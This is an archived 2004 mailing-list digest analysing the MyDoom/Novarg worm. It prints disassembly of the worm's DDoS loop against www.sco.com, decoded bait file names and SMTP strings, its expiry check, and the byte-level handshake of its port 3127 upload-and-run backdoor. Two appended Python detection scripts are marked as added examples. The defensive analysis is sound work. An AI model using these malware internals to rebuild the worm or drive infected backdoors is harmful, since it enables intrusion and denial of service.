Digest of parts of messages from the Trojan Horses Research Mailing List
regarding the new mass mailer worm
----------------------------------
27th of January, 2004
------------------------------------------------------------------------
http://ecompute.org/th-list
========================================================================

Preface
-------

This text comes to supplement the different Anti Virus vendors' web pages
with more information on the analyses of the new worm that hit yesterday.
It was called different names by different AV companies, which caused a lot
of confusion, but that was to be expected with a new fast-spreading worm in
the wild. Our purpose in releasing this digest of email messages is to help
the community of sysadmins and security researchers combat this worm.

Some web pages to get information on:

http://us.mcafee.com/virusInfo/default.asp?id=mydoom
http://securityresponse.symantec.com/avcenter/venc/data/w32.novarg.a@mm.html
http://www.f-secure.com/v-descs/novarg.shtml
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MIMAIL.R
http://www3.ca.com/virusinfo/virus.aspx?ID=38102

NOTE (1): This is a compiled digest of information; it is served as-is. I
didn't really have the time to invest in editing it and making it look good,
formatted or organized. I hope you find it helpful.

NOTE (2): All the below information and messages are forwarded from
TH-Research with the permission of the original authors and the list
manager, as dictated by the list's FAQ. I guess we can call this
"declassification". :o)

NOTE (3): Thanks go to Daniel Otis Vigil from MooSoft Development
(www.moosoft.com) for sharing the sample with the mailing list first.

NOTE (4): Thanks are also due to the different members of TH-Research who
helped with this new threat on the list and in our live joint "war room".
There are many who are not quoted below.

You can find a copy of this document at:
http://www.math.org.il/newworm-digest1.txt

What is this mass-mailer worm?
------------------------------

This worm arrives in your Inbox as an attachment. The subject of the email
changes, and the body contains one of the following lines:

- "The message cannot be represented in 7-bit ASCII encoding and has been
  sent as a binary attachment."
- "The message contains Unicode characters and has been sent as a binary
  attachment."
- "Mail transaction failed. Partial message is available."

The attachment can be one of a few file types: EXE, PIF, CMD, SCR, and very
often a ZIP archive.

This worm is supposed to perform a DoS attack against www.sco.com and acts
as a backdoor, listening on port 3127. The worm is built of an EXE and a DLL
file, and it is packed with UPX.

Spreading
---------

The worm spreads via email and by copying itself to the Kazaa shared folder
on a victim's machine, if one exists. The worm is set to die on February
12th, 2004.

The spreading speed of this worm was amazing. It hit the Internet hard and
it hit it fast. MessageLabs (which obviously detected the worm
heuristically; it's how their system works) shows an incredible amount of
emails, check out:
http://www.messagelabs.com/viruseye/info/default.asp?frompage=introduction&fromurl=%2Fviruseye%2Fintro%2Fdefault%2Easp&virusname=W32%2FMyDoom%2EA%2Dmm

Some more fun statistics at RAV: http://www.rav.ro/ravmsstats/

As reported by MessageLabs:
-----
Currently we estimate we will hit 1,000,000/day, which is Sobig.F levels.
Interesting that there was a 6 hour gap after we stopped our 1st copies.
Perhaps these were seeds (haven't checked yet).

Month   Day   Hour   Count
-----   ---   ----   -----
    1    26     13       2
  ...
    1    26     19     252
    1    26     20    4292
    1    26     21   27491
    1    26     22   53203
    1    26     23   54926
    1    27      0   51668
    1    27      1   51774
    1    27      2   50311
    1    27      3   50586
    1    27      4   52700
-----

I believe we all know how serious this worm is (still is, to a level), so
let's skip to the next part.

Is this a Mimail variant?
-------------------------

Despite original assumptions, it turns out that the code has nothing in
common with the MiMail strain.

Some reverse engineering done on this worm:
-------------------------------------------

Nicolas Brulez:
-----
From my quick and dirty analysis, it's a thread that does the DDOS. It has
below normal priority, and it just does a GET:

"GET / HTTP/1.1\r\nHost: www.sco.com\r\n\r\n"

That's about it, I think.

.text:004A6BB4 DDOS            proc near               ; CODE XREF: sub_4A6C3B+99p
.text:004A6BB4                                         ; DATA XREF: sub_4A6C3B+85o
.text:004A6BB4
.text:004A6BB4 String          = byte ptr -210h
.text:004A6BB4 var_10          = dword ptr -10h
.text:004A6BB4 dwExitCode      = dword ptr  8
.text:004A6BB4
.text:004A6BB4                 push    ebp
.text:004A6BB5                 mov     ebp, esp
.text:004A6BB7                 sub     esp, 210h
.text:004A6BBD                 push    esi
.text:004A6BBE                 push    edi
.text:004A6BBF                 lea     eax, [ebp+String]
.text:004A6BC5                 push    offset GET      ; "GET / HTTP/1.1\r\nHost: www.sco.com\r\n\r\n"
.text:004A6BCA                 push    eax
.text:004A6BCB                 call    decrypt
.text:004A6BD0                 pop     ecx
.text:004A6BD1                 pop     ecx
.text:004A6BD2                 push    THREAD_PRIORITY_BELOW_NORMAL ; nPriority
.text:004A6BD4                 call    ds:GetCurrentThread ; GetCurrentThread:
.text:004A6BDA                 push    eax             ; hThread
.text:004A6BDB                 call    ds:SetThreadPriority ; SetThreadPriority:
.text:004A6BE1                 mov     esi, [ebp+dwExitCode]
.text:004A6BE4                 test    esi, esi
.text:004A6BE6                 jnz     short loc_4A6BEF
.text:004A6BE8                 push    esi             ; dwExitCode
.text:004A6BE9                 call    ds:ExitThread   ; ExitThread:
.text:004A6BEF
.text:004A6BEF loc_4A6BEF:                             ; CODE XREF: DDOS+32j
.text:004A6BEF                 lea     edi, [ebp+var_10]
.text:004A6BF2                 movsd
.text:004A6BF3                 movsd
.text:004A6BF4                 movsd
.text:004A6BF5                 movsd
.text:004A6BF6
.text:004A6BF6 loc_4A6BF6:                             ; CODE XREF: DDOS+53j
.text:004A6BF6                                         ; DDOS+85j
.text:004A6BF6                 lea     eax, [ebp+var_10]
.text:004A6BF9                 push    8
.text:004A6BFB                 push    eax
.text:004A6BFC                 call    sub_4A6A9F
.text:004A6C01                 mov     esi, eax
.text:004A6C03                 pop     ecx
.text:004A6C04                 test    esi, esi
.text:004A6C06                 pop     ecx
.text:004A6C07                 jz      short loc_4A6BF6
.text:004A6C09                 lea     eax, [ebp+String]
.text:004A6C0F                 push    0
.text:004A6C11                 push    eax             ; lpString
.text:004A6C12                 call    ds:lstrlenA     ; lstrlenA:
.text:004A6C18                 push    eax
.text:004A6C19                 lea     eax, [ebp+String]
.text:004A6C1F                 push    eax
.text:004A6C20                 push    esi
.text:004A6C21                 call    ds:WS2_32_19    ; send
.text:004A6C27                 push    12Ch            ; dwMilliseconds
.text:004A6C2C                 call    ds:Sleep        ; Sleep:
.text:004A6C32                 push    esi
.text:004A6C33                 call    ds:WS2_32_3     ; closesocket
.text:004A6C39                 jmp     short loc_4A6BF6
.text:004A6C39 DDOS            endp
.text:004A6C39

I might be wrong, but I didn't look more than a couple of seconds.
-----

The DLL as analyzed by Rolf Rolles:
-----
A description of the DLL's functionality in MiMail.R:

Listens on port 3127; accepts a maximum of 3 connections at a time.

If the first byte of the received data is 0x85, the DLL skips the next byte,
then compares the next dword read to 133C9EA2h; if this is true, it accepts
the executable from the sender, downloads it to a temp file/directory and
runs it.

If the first byte of the received data is 4, we check for the following
pattern: [0x4 0x1 PORT] [host address]. If host address doesn't "look good"
then the address to resolve is passed as a string afterwards. "[" is sent
when the port forwarding code gets an error; "Z" is sent if everything goes
smoothly.
-----

Slight correction/clarification:

In the second paragraph, the second mention of 0x4 is distinct, i.e. the
traffic looks like 0x4 |0x4 0x1 [port] [hostip]|. Also, when I said the DLL
sends back a 'Z' or a '[' on fail/success respectively, this is actually
inserted in the position of the 0x1 character and sends back the eight bytes
indicated between the pipes above.

Sorry for the confusion,
Rolf
-----

Some code snippets from Nicolas Brulez:
-----
Here are a few pieces of information I gathered from the binary. No serious
analysis at all, just to have a "look and feel":

With the script, it takes no time to completely decode the entire thing.
See below:

.text:004A25C0 aVagreargtrgpba db 'InternetGetConnectedState',0 ; DATA XREF: sub_4A4681+44o
.text:004A25DA                 align 4
.text:004A25DC aJvavarg_qyy    db 'wininet.dll',0        ; DATA XREF: sub_4A4681+Ao
.text:004A25E8 aAhxr2004       db 'nuke2004',0           ; DATA XREF: .text:004A11A8o
.text:004A25F1                 align 4
.text:004A25F4 aBssvpr_penpx   db 'office_crack',0       ; DATA XREF: .text:004A11A4o
.text:004A2601                 align 4
.text:004A2604 aEbbgxvgkc      db 'rootkitXP',0          ; DATA XREF: .text:004A11A0o
.text:004A260E                 align 4
.text:004A2610 aFgevcTvey2_0oq db 'strip-girl-2.0bdcom_patches',0
.text:004A2610                                         ; DATA XREF: .text:004A119Co
.text:004A262C aNpgvingvba_pen db 'activation_crack',0   ; DATA XREF: .text:004A1198o
.text:004A263D                 align 4
.text:004A2640 aVpd2004Svany   db 'icq2004-final',0      ; DATA XREF: .text:004A1194o
.text:004A264E                 align 4
.text:004A2650 aJvanzc5        db 'winamp5',0

.text:004A1194                 dd offset aVpd2004Svany   ; "icq2004-final"
.text:004A1198                 dd offset aNpgvingvba_pen ; "activation_crack"
.text:004A119C                 dd offset aFgevcTvey2_0oq ; "strip-girl-2.0bdcom_patches"
.text:004A11A0                 dd offset aEbbgxvgkc      ; "rootkitXP"
.text:004A11A4                 dd offset aBssvpr_penpx   ; "office_crack"
.text:004A11A8                 dd offset aAhxr2004       ; "nuke2004"

That's probably the names it uses for Kazaa spreading.

It also encodes the domain names below:

.text:004A13F0                 dd offset aZfa_pbz        ; "msn.com"
.text:004A13F4                 dd offset aLnubb_pbz      ; "yahoo.com"
.text:004A13F8                 dd offset aUbgznvy_pbz    ; "hotmail.com"

Probably used for random mail generation; that will be used in the From
field.

The possible messages:

.text:004A348C aMailTransactio db 'Mail transaction failed. Partial message is available.',0
.text:004A348C                                         ; DATA XREF: sub_4A7255+42o
.text:004A34C3                 align 8
.text:004A34C8 aTheMessageCont db 'The message contains Unicode characters and has been sent as'
.text:004A34C8                                         ; DATA XREF: sub_4A7255+38o
.text:004A34C8                 db ' a binary attachment.',0
.text:004A351A                 align 8
.text:004A3520 aTheMessageCann db 'The message cannot be represented in 7-bit ASCII encoding an'
.text:004A3520                                         ; DATA XREF: sub_4A7255+2Eo
.text:004A3520                 db 'd has been sent as a binary attachment.',0

Now about the headers, which were encoded too:

.text:004A35DC aKZfznvyCevbevg db 0Dh,0Ah               ; DATA XREF: sub_4A74DD+100o
.text:004A35DC                 db 'X-MSMail-Priority: Normal',0
.text:004A35F8 aKCevbevgl3     db 0Dh,0Ah               ; DATA XREF: sub_4A74DD+EEo
.text:004A35F8                 db 'X-Priority: 3',0
.text:004A3608 aBoundaryS      db 9,'boundary="%s"',0   ; DATA XREF: sub_4A74DD+E0o
.text:004A3617                 align 4
.text:004A3618 aPbagragGlcrZhy db 0Dh,0Ah               ; DATA XREF: sub_4A74DD+CCo
.text:004A3618                 db 'Content-Type: multipart/mixed;',0Dh,0Ah,0
.text:004A363B                 align 4
.text:004A363C aZvzrIrefvba1_0 db 0Dh,0Ah               ; DATA XREF: sub_4A74DD+BAo
.text:004A363C                 db 'MIME-Version: 1.0',0
.text:004A3650 aQngr           db 0Dh,0Ah               ; DATA XREF: sub_4A74DD+99o
.text:004A3650                 db 'Date: ',0
.text:004A3659                 align 4
.text:004A365C aFhowrpg        db 0Dh,0Ah               ; DATA XREF: sub_4A74DD+7Do
.text:004A365C                 db 'Subject: ',0
.text:004A3668 aGb             db 0Dh,0Ah               ; DATA XREF: sub_4A74DD+66o
.text:004A3668                 db 'To: ',0
.text:004A366F                 align 4
.text:004A3670 aSebz           db 'From: ',0            ; DATA XREF: sub_4A74DD+45o
.text:004A3677                 align 4
.text:004A3678 ; u__::a_S(u__8,long long)
.text:004A3678 a_S__3u__4u__8x db '----=_%s_%.3u_%.4u_%.8X.%.8X',0
.text:004A3678                                         ; DATA XREF: sub_4A74DD+39o
.text:004A3695                 align 4
.text:004A3698 aNextpart       db 'NextPart',0          ; DATA XREF: sub_4A74DD+34o
.text:004A36A1                 align 4
.text:004A36A4 aS              db 0Dh,0Ah               ; DATA XREF: sub_4A75FD+C0o
.text:004A36A4                 db 0Dh,0Ah
.text:004A36A4                 db '--%s--',0Dh,0Ah
.text:004A36A4                 db 0Dh,0Ah,0
.text:004A36B3                 align 8
.text:004A36B8 aFPbagragGlcrNc db '--%s',0Dh,0Ah        ; DATA XREF: sub_4A75FD+76o
.text:004A36B8                 db 'Content-Type: application/octet-stream;',0Dh,0Ah
.text:004A36B8                 db 9,'name="%s"',0Dh,0Ah
.text:004A36B8                 db 'Content-Transfer-Encoding: base64',0Dh,0Ah
.text:004A36B8                 db 'Content-Disposition: attachment;',0Dh,0Ah
.text:004A36B8                 db 9,'filename="%s"',0Dh,0Ah
.text:004A3758 aFPbagragGlcrGr db '--%s',0Dh,0Ah        ; DATA XREF: sub_4A75FD+31o
.text:004A3758                 db 'Content-Type: text/plain;',0Dh,0Ah
.text:004A3758                 db 9,'charset="Windows-1252"',0Dh,0Ah
.text:004A3758                 db 'Content-Transfer-Encoding: 7bit',0Dh,0Ah
.text:004A3758                 db 0Dh,0Ah,0
.text:004A37B6                 align 4
.text:004A37B8 aGuvfVfNZhygvCn db 'This is a multi-part message in MIME format.',0Dh,0Ah
.text:004A37B8                                         ; DATA XREF: sub_4A75FD+1Bo
.text:004A37B8                 db 0Dh,0Ah,0
.text:004A37E9                 align 4
.text:004A37EC aQuit           db 'QUIT',0Dh,0Ah,0      ; DATA XREF: sub_4A7B47+286o
.text:004A37F3                 align 4
.text:004A37F4 a__0            db 0Dh,0Ah               ; DATA XREF: sub_4A7B47+25Fo
.text:004A37F4                 db '.',0Dh,0Ah,0

SMTP related:

.text:004A37FC aData           db 'DATA',0Dh,0Ah,0      ; DATA XREF: sub_4A7B47+1D9o
.text:004A3803                 align 4
.text:004A3804 aEpcgGbF        db 'RCPT TO:<%s>',0Dh,0Ah,0 ; DATA XREF: sub_4A7B47+1A3o
.text:004A3813                 align 4
.text:004A3814 aZnvySebzF      db 'MAIL FROM:<%s>',0Dh,0Ah,0 ; DATA XREF: sub_4A7B47+167o
.text:004A3825                 align 4
.text:004A3828 aUrybF          db 'HELO %s',0Dh,0Ah,0   ; DATA XREF: sub_4A7B47+12Bo
.text:004A3832                 align 4
.text:004A3834 aRuybF          db 'EHLO %s',0Dh,0Ah,0   ; DATA XREF: sub_4A7B47+F2o
.text:004A383E                 align 4

It also grabs the SMTP server (strings were encoded):

.text:004A7E0D                 push    offset aFbsgjnerZvpe_2 ; "Software\\Microsoft\\Internet Account Man"...
.text:004A7E12                 push    eax
.text:004A7E13                 call    sub_4A465E
.text:004A7E18                 lea     eax, [ebp+ValueName]
.text:004A7E1E                 push    offset aFzgcFreire ; "SMTP Server"
.text:004A7E23                 push    eax
.text:004A7E24                 call    sub_4A465E
.text:004A7E29                 add     esp, 10h
.text:004A7E2C                 lea     eax, [ebp+hKey]
.text:004A7E2F                 xor     edi, edi
.text:004A7E31                 push    eax             ; phkResult
.text:004A7E32                 push    20019h          ; samDesired
.text:004A7E37                 lea     eax, [ebp+SubKey]
.text:004A7E3D                 push    edi             ; ulOptions
.text:004A7E3E                 push    eax             ; lpSubKey
.text:004A7E3F                 push    80000001h       ; hKey
.text:004A7E44                 call    ds:RegOpenKeyExA ; RegOpenKeyExA:

Nothing that isn't known by now though. I will do a complete analysis when
time is on my side.
-----

-----
Nicolas Brulez in reply to a message from a member I couldn't reach to get
his approval for forwarding his information and name. The email was about
the body text of the worm email messages as captured on his network:
-----
.text:004A3334                 dd offset aTest_0       ; "test"
.text:004A333C                 dd offset aUv           ; "hi"
.text:004A3344                 dd offset aUryyb        ; "hello"
.text:004A334C                 dd offset aZnvyQryvirelFlfgrz ; "Mail Delivery System"
.text:004A3354                 dd offset aZnvyGenafnpgvbaSnvyrq ; "Mail Transaction Failed"
.text:004A335C                 dd offset aFreireErcbeg ; "Server Report"
.text:004A3364                 dd offset aFgnghf       ; "Status"
.text:004A336C                 dd offset aReebe        ; "Error"
.text:004A3374                 dd offset dword_4A33E8  ; blank

You see some variation in the case because the worm seems to use uppercase
at times. Here is a code snippet:

.text:004A6ED6 sub_4A6ED6      proc near               ; CODE XREF: sub_4A76D2+60p
.text:004A6ED6                 push    ebx
.text:004A6ED7                 push    esi
.text:004A6ED8                 mov     ebx, eax
.text:004A6EDA                 call    PRNG

snip... some more pseudo random number stuff

.text:004A6F39
.text:004A6F39 loc_4A6F39:                             ; CODE XREF: sub_4A6ED6+6Fj
.text:004A6F39                 movsx   eax, al
.text:004A6F3C                 add     ecx, 8
.text:004A6F3F                 add     esi, eax
.text:004A6F41                 mov     al, [ecx]
.text:004A6F43                 test    al, al
.text:004A6F45                 jnz     short loc_4A6F39
.text:004A6F47                 call    PRNG
.text:004A6F4C                 movzx   eax, ax
.text:004A6F4F                 cdq
.text:004A6F50                 idiv    esi
.text:004A6F52                 xor     esi, esi
.text:004A6F54                 xor     eax, eax
.text:004A6F56                 inc     esi
.text:004A6F57                 mov     cl, 0Ch
.text:004A6F59
.text:004A6F59 loc_4A6F59:                             ; CODE XREF: sub_4A6ED6+96j
.text:004A6F59                 movsx   ecx, cl
.text:004A6F5C                 add     esi, ecx
.text:004A6F5E                 cmp     esi, edx
.text:004A6F60                 jge     short loc_4A6F6E
.text:004A6F62                 mov     cl, byte ptr ds:subjects[eax*8] ; Selection of the subject?
.text:004A6F69                 inc     eax
.text:004A6F6A                 test    cl, cl
.text:004A6F6C                 jnz     short loc_4A6F59
.text:004A6F6E
.text:004A6F6E loc_4A6F6E:                             ; CODE XREF: sub_4A6ED6+8Aj
.text:004A6F6E                 cmp     ds:byte_4A3328[eax*8], 0
.text:004A6F76                 jnz     short loc_4A6F7A
.text:004A6F78                 xor     eax, eax
.text:004A6F7A

snip.......

.text:004A6F8F
.text:004A6F8F loc_4A6F8F:                             ; CODE XREF: sub_4A6ED6+57j
.text:004A6F8F                 call    PRNG
.text:004A6F94                 movzx   eax, ax
.text:004A6F97                 push    64h
.text:004A6F99                 cdq
.text:004A6F9A                 pop     ecx
.text:004A6F9B                 idiv    ecx
.text:004A6F9D                 cmp     edx, 32h
.text:004A6FA0                 jl      short loc_4A6FB8
.text:004A6FA2                 cmp     edx, 55h
.text:004A6FA5                 jge     short loc_4A6FBD
.text:004A6FA7                 add     ebx, 104h
.text:004A6FAD                 push    1               ; cchLength
.text:004A6FAF                 push    ebx             ; lpsz
.text:004A6FB0                 call    ds:CharUpperBuffA ; CharUpperBuffA:
.text:004A6FB6                 jmp     short loc_4A6FCA

Uppercase the whole string (hence your TEST).

.text:004A6FB8 ; ---------------------------------------------------------------------------
.text:004A6FB8
.text:004A6FB8 loc_4A6FB8:                             ; CODE XREF: sub_4A6ED6+CAj
.text:004A6FB8                 cmp     edx, 55h
.text:004A6FBB                 jl      short loc_4A6FCA
.text:004A6FBD
.text:004A6FBD loc_4A6FBD:                             ; CODE XREF: sub_4A6ED6+CFj
.text:004A6FBD                 add     ebx, 104h
.text:004A6FC3                 push    ebx             ; lpsz
.text:004A6FC4                 call    ds:CharUpperA   ; CharUpperA:
.text:004A6FCA

Just one char, hence your "Hi, Test" etc.
-----

And more from Nicolas Brulez:
-----
I think it has another possible message:

.text:004A348C aMailTransactio db 'Mail transaction failed. Partial message is available.',0
.text:004A348C                                         ; DATA XREF: sub_4A7255+42o
.text:004A34C3                 align 8
.text:004A34C8 aTheMessageCont db 'The message contains Unicode characters and has been sent as'
.text:004A34C8                                         ; DATA XREF: sub_4A7255+38o
.text:004A34C8                 db ' a binary attachment.',0
.text:004A351A                 align 8
.text:004A3520 aTheMessageCann db 'The message cannot be represented in 7-bit ASCII encoding an'
.text:004A3520                                         ; DATA XREF: sub_4A7255+2Eo
.text:004A3520                 db 'd has been sent as a binary attachment.',0
.text:004A3584 aTest           db 'test',0             ; DATA XREF: sub_4A7255+24o

I missed the test one. This comes from this piece of code:

.text:004A7272                 mov     [ebp+var_28], 5
.text:004A7279                 mov     [ebp+var_24], offset aTest ; "test"
.text:004A7280                 mov     [ebp+var_20], ecx
.text:004A7283                 mov     [ebp+var_1C], offset aTheMessageCann ; "The message cannot be represented in 7-"...
.text:004A728A                 mov     [ebp+var_18], ecx
.text:004A728D                 mov     [ebp+var_14], offset aTheMessageCont ; "The message contains Unicode characters"...
.text:004A7294                 mov     [ebp+var_10], esi
.text:004A7297                 mov     [ebp+var_C], offset aMailTransactio ; "Mail transaction failed. Partial messag"...
.text:004A729E                 mov     [ebp+var_4], eax
.text:004A72A1                 call    PRNG
.text:004A72A6                 movzx   eax, ax

Here is the code that checks the expiration:

.text:004A3D6E date_limite     proc near               ; CODE XREF: sub_4A3FB1+4Bp
.text:004A3D6E
.text:004A3D6E SystemTimeAsFileTime= _FILETIME ptr -10h
.text:004A3D6E FileTime        = _FILETIME ptr -8
.text:004A3D6E arg_0           = dword ptr  8
.text:004A3D6E
.text:004A3D6E                 push    ebp
.text:004A3D6F                 mov     ebp, esp
.text:004A3D71                 sub     esp, 10h
.text:004A3D74                 lea     eax, [ebp+SystemTimeAsFileTime]
.text:004A3D77                 push    eax             ; lpSystemTimeAsFileTime
.text:004A3D78                 call    ds:GetSystemTimeAsFileTime ; GetSystemTimeAsFileTime:
.text:004A3D7E                 lea     eax, [ebp+FileTime]
.text:004A3D81                 push    eax             ; lpFileTime
.text:004A3D82                 mov     eax, [ebp+arg_0]
.text:004A3D85                 add     eax, 224h
.text:004A3D8A                 push    eax             ; lpSystemTime
.text:004A3D8B                 call    ds:SystemTimeToFileTime ; SystemTimeToFileTime:
.text:004A3D91                 mov     eax, [ebp+SystemTimeAsFileTime.dwHighDateTime]
.text:004A3D94                 cmp     eax, [ebp+FileTime.dwHighDateTime]
.text:004A3D97                 jbe     short not_12_february
.text:004A3D99                 xor     eax, eax        ; Worm expired.
.text:004A3D9B                 inc     eax
.text:004A3D9C                 leave
.text:004A3D9D                 retn
.text:004A3D9E ; ---------------------------------------------------------------------------
.text:004A3D9E
.text:004A3D9E not_12_february:                        ; CODE XREF: date_limite+29j
.text:004A3D9E                 jnb     short loc_4A3DA4
.text:004A3DA0                 xor     eax, eax
.text:004A3DA2                 leave
.text:004A3DA3                 retn
-----

D'Aloisio Marc observed some things about the DoS attack, and raised some
preliminary questions:
-----
Has anyone seen the DOS against SCO actually happen?

I have the new critter in a test environment where we conducted a
preliminary and rudimentary functionality and threat analysis, and the only
activity I can get it to perform related to www.sco.com is to resolve the
name. In fact, it seems very unhappy if it cannot resolve www.sco.com. Once
it can, it happily scans local files for anything that can be construed
(very loosely) as a domain and tries to resolve mail servers based on these.
In fact, right now it's trying to resolve 'mx.makewin.rsp'. 'Makewin.rsp' is
a file referenced in the help files of my DigitalMars C++ compiler on a test
machine, so it's not a very smart worm.

The worm also seems to like to increment the third octet of the host IP by
one and SYN to port 25 of that address over and over and over...

I have played with the date, etc., but still no activity directed toward
www.sco.com. It did die after 12 February, but gladly resurrected when the
date was set back prior to that.

I haven't had time to go through a code analysis - that will come later as
time permits.
-----

-----
Gadi Evron - ge@warp.mx.dk.
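The port 3127 handshake that Rolf Rolles describes above, written up as a detection-side classifier for captured payloads (an added example, not code from the digest or its contributors; the byte orders, the 0.0.0.x host-name convention and the meaning of 'Z'/'[' are assumptions taken from SOCKS4, as stated in the code):

```python
"""Classifier for the first bytes of a client connection to the MyDoom/Novarg
backdoor port (TCP 3127), built from Rolf Rolles' description above.

Added example, not code from the digest or its contributors.  Assumptions the
page does not state: the 32-bit magic is read as a native little-endian x86
dword; the port is big-endian and a 0.0.0.x host means "resolve the
NUL-terminated name that follows" (SOCKS4/SOCKS4a conventions); 'Z' (0x5A) is
the success reply and '[' (0x5B) the error reply, as in SOCKS4 and in Rolf's
first message.
"""
import struct

BACKDOOR_PORT = 3127           # from the page
UPLOAD_FIRST_BYTE = 0x85       # from the page
UPLOAD_MAGIC = 0x133C9EA2      # dword compared after the skipped byte (page)
PROXY_FIRST_BYTE = 0x04        # from the page
REPLY_OK, REPLY_ERROR = ord("Z"), ord("[")


def classify_3127_request(data: bytes) -> dict:
    """Label a captured client->3127 payload as 'upload', 'proxy' or 'unknown'."""
    if not data:
        return {"kind": "empty"}
    if data[0] == UPLOAD_FIRST_BYTE:
        # 0x85, one ignored byte, 32-bit magic, then the executable to drop and run
        if len(data) < 6:
            return {"kind": "upload", "complete": False}
        magic = struct.unpack_from("<I", data, 2)[0]
        return {"kind": "upload", "complete": True,
                "magic_ok": magic == UPLOAD_MAGIC, "payload_len": len(data) - 6}
    if data[0] == PROXY_FIRST_BYTE:
        # 0x04 | 0x04 0x01 [port] [hostip] | then an optional host name
        if len(data) < 9:
            return {"kind": "proxy", "complete": False}
        if data[1] != 0x04 or data[2] != 0x01:
            return {"kind": "unknown"}
        port = struct.unpack_from(">H", data, 3)[0]
        ip = data[5:9]
        host = "%d.%d.%d.%d" % tuple(ip)
        if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:
            # address "doesn't look good": the name to resolve follows (assumed NUL-terminated)
            host = data[9:].split(b"\x00", 1)[0].decode("ascii", "replace")
        return {"kind": "proxy", "complete": True, "port": port, "host": host}
    return {"kind": "unknown"}


def parse_3127_reply(reply: bytes) -> dict:
    """The reply echoes the 8 bytes between the pipes with 0x01 replaced by 'Z' or '['."""
    if len(reply) != 8 or reply[0] != 0x04 or reply[1] not in (REPLY_OK, REPLY_ERROR):
        return {"kind": "unknown"}
    return {"kind": "proxy-reply", "ok": reply[1] == REPLY_OK,
            "port": struct.unpack_from(">H", reply, 2)[0]}


if __name__ == "__main__":
    # Constructed sample payloads, as a sensor might capture them on port 3127.
    upload = b"\x85\x00" + struct.pack("<I", UPLOAD_MAGIC) + b"MZ\x90\x00"
    proxy = b"\x04\x04\x01" + struct.pack(">H", 25) + bytes([192, 0, 2, 10])
    print(classify_3127_request(upload))
    print(classify_3127_request(proxy))
    print(parse_3127_reply(b"\x04Z" + proxy[3:]))
```

On a real capture, feed the first bytes of each client-to-3127 stream through classify_3127_request; a well-formed proxy request or an upload with the correct magic is a strong sign that the host is running the worm's DLL.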
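The string encoding behind Nicolas Brulez's listings above, shown as a scan for the encoded form of the page's own indicators (an added example, not code from the digest; the sample buffer is constructed in the code):

```python
"""Search a byte buffer for the ROT13-encoded form of known MyDoom/Novarg
strings.  Added example, not code from the digest: it shows why the strings
Nicolas Brulez lists above (Kazaa file names, mail domains, SMTP verbs, the
"SMTP Server" registry value) do not show up in a plain strings dump.  The
IDA label names on the page are made from the stored, encoded bytes
(aZfa_pbz, aLnubb_pbz, aFzgcFreire) and are exactly ROT13 of the decoded
comments ("msn.com", "yahoo.com", "SMTP Server"), so the encoding is ROT13
over letters only; digits and punctuation are stored as-is.
"""
import codecs

# Plaintext indicators taken from the listings on this page.
INDICATORS = [
    "InternetGetConnectedState", "wininet.dll", "www.sco.com", "SMTP Server",
    "icq2004-final", "activation_crack", "rootkitXP", "office_crack",
    "msn.com", "yahoo.com", "hotmail.com", "RCPT TO:<%s>",
]


def rot13(text: str) -> str:
    """ROT13 over ASCII letters; everything else is left unchanged."""
    return codecs.encode(text, "rot_13")


def find_plain(blob: bytes, indicators=INDICATORS) -> list:
    """Offsets of indicators stored in the clear (what a strings dump would show)."""
    return sorted((blob.find(s.encode()), s) for s in indicators if s.encode() in blob)


def find_rot13(blob: bytes, indicators=INDICATORS) -> list:
    """Offsets of indicators stored as ROT13; each hit is (offset, decoded text)."""
    hits = []
    for plain in indicators:
        enc = rot13(plain).encode()
        pos = blob.find(enc)
        while pos != -1:
            hits.append((pos, plain))
            pos = blob.find(enc, pos + 1)
    return sorted(hits)


# Constructed sample: a few NUL-terminated encoded strings, laid out the way the
# .text listings above show them.  Not bytes from the real worm.
SAMPLE = b"\x00".join([
    b"\x90" * 4,
    rot13("wininet.dll").encode(),
    rot13("InternetGetConnectedState").encode(),
    rot13("www.sco.com").encode(),
    rot13("icq2004-final").encode(),
    b"",
])

if __name__ == "__main__":
    print("plain hits:", find_plain(SAMPLE))    # nothing: the clear text is not there
    print("rot13 hits:", find_rot13(SAMPLE))    # the four encoded strings, by offset
```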